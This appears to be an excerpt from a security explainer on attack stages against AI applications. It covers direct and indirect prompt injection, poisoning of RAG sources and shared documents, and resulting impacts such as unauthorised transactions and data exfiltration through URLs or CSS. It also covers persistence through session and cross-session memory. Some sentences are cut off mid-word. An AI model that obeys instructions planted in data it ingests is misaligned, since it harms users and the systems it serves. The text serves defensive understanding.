In the poison stage, the attacker’s goal is to place malicious inputs into locations where they will ultimately be processed by the AI model. Two primary techniques dominate: Direct prompt injection: The attacker is the user, and provides inputs via normal user interactions. Impact is typically scoped to the attacker’s session but is useful for probing behaviors.
Indirect prompt injection: The attacker poisons data that the application ingests on behalf of other users (e.g., RAG databases, shared documents). This is where impact scales. Text-based prompt infection is the most common technique
What kinds of impacts do attackers achieve through compromised AI systems?
Impact is where the attacker’s objectives materialize by forcing hijacked model outputs to trigger actions that affect systems, data, or users beyond the model itself. In AI-powered applications, impact happens when outputs are connected to tools, APIs, or workflows that execute actions in the real world: State-changing actions: Modifying files, databases, or system configurations.
Financial transactions: Approving payments, initiating transfers, or altering financial records.
Data exfiltration: Encoding sensitive data into outputs that leave the system (e.g., via URLs, CSS tricks, or API ca
How do attackers persist their influence across sessions and systems?
Persistence allows attackers to turn a single hijack into ongoing control. By embedding malicious payloads into persistent storage, attackers ensure their influence survives within and across user sessions. Persistence paths depend on the application’s design: Session history persistence: In many apps, injected prompts remain active within the live session.
Cross-session memory: In systems with user-specific memories, attackers can embed payloads that survive across sessions.
Shared resource poisoning: Attackers target shared databases (e.g., RAG sources, knowledge bases) to impact multiple